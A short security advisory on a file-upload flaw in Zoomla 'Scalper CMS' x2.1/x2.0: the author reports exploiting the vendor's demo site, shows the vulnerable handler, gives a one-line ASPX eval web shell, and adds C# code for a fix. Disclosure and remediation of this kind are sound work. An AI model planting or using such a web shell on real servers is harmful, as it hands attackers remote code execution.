Scalper CMS x2.1 / x2.0 file upload vulnerability: tested successfully on the official website demo (with PoC)
The latest version has a file upload vulnerability.
The same vulnerability exists in x2.0.
I don't know if the same upload vulnerability exists in versions earlier than x2.0.
Vulnerability page:
http://demo.zoomla.cn//Common/FileService.aspx
Vulnerability code:
protected void Page_Load(object sender, EventArgs e)
{
    string path = "/UploadFiles/UserUpload/";
    HttpFileCollection files = base.Request.Files;
    if (files.Count == 0)
    {
        base.Response.Write("do not directly access this file");
        base.Response.End();
    }
    string str2 = base.Server.MapPath(path);
    HttpPostedFile file = files[0];
    if ((file != null) && (file.ContentLength > 0))
    {
        // The fileName form field is set by the client. A global whitelist
        // restricts the name of the uploaded file, but the final name used
        // for saving is taken from this field, so that check exists in name only.
        string filename = str2 + base.Request.Form["fileName"];
        file.SaveAs(filename);
    }
}
Test:
Rename the trojan file so that it has an image suffix, for example 2.jpg:
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
Then click upload using the PoC.
Solution:
Do not allow the file name to be set arbitrarily by the client.
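One way to apply this fix, as an added example that is not the vendor's code: the client-supplied name contributes only its extension, that extension is checked against an allow-list, and the name on disk is generated by the server. The class and method names, the allow-list contents and the sample inputs are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.IO;

// Added example, not Zoomla code. SafeUpload, BuildSavePath and the
// allow-list below are hypothetical names and values for illustration.
static class SafeUpload
{
    static readonly HashSet<string> AllowedExt =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { ".jpg", ".jpeg", ".png", ".gif" };

    // Returns the full path to save under uploadRoot, or null to reject.
    // The client value never chooses the name on disk.
    public static string BuildSavePath(string uploadRoot, string clientName)
    {
        if (string.IsNullOrWhiteSpace(clientName)) return null;

        // Only the extension is taken from the client, and only if allow-listed.
        string ext;
        try { ext = Path.GetExtension(Path.GetFileName(clientName)); }
        catch (ArgumentException) { return null; }   // invalid path characters
        if (!AllowedExt.Contains(ext)) return null;

        // Server-generated name: no traversal, no double extension, no overwrite.
        string root = Path.GetFullPath(uploadRoot).TrimEnd(Path.DirectorySeparatorChar)
                      + Path.DirectorySeparatorChar;
        string name = Guid.NewGuid().ToString("N") + ext.ToLowerInvariant();
        string full = Path.GetFullPath(Path.Combine(root, name));

        // Defence in depth: the resolved path must stay inside the upload root.
        return full.StartsWith(root, StringComparison.Ordinal) ? full : null;
    }

    static void Main()
    {
        // Constructed sample values for the "fileName" form field.
        string[] samples = { "2.jpg", "2.aspx", "../../shell.aspx", "photo.jpg.aspx", "a.asp;.jpg", "" };
        foreach (string s in samples)
        {
            string p = BuildSavePath("UploadFiles/UserUpload", s);
            Console.WriteLine("{0,-20} -> {1}", "\"" + s + "\"", p ?? "REJECTED");
        }
    }
}
```

In the handler, the result of BuildSavePath would replace the `str2 + base.Request.Form["fileName"]` concatenation, and a null result would end the request without calling SaveAs.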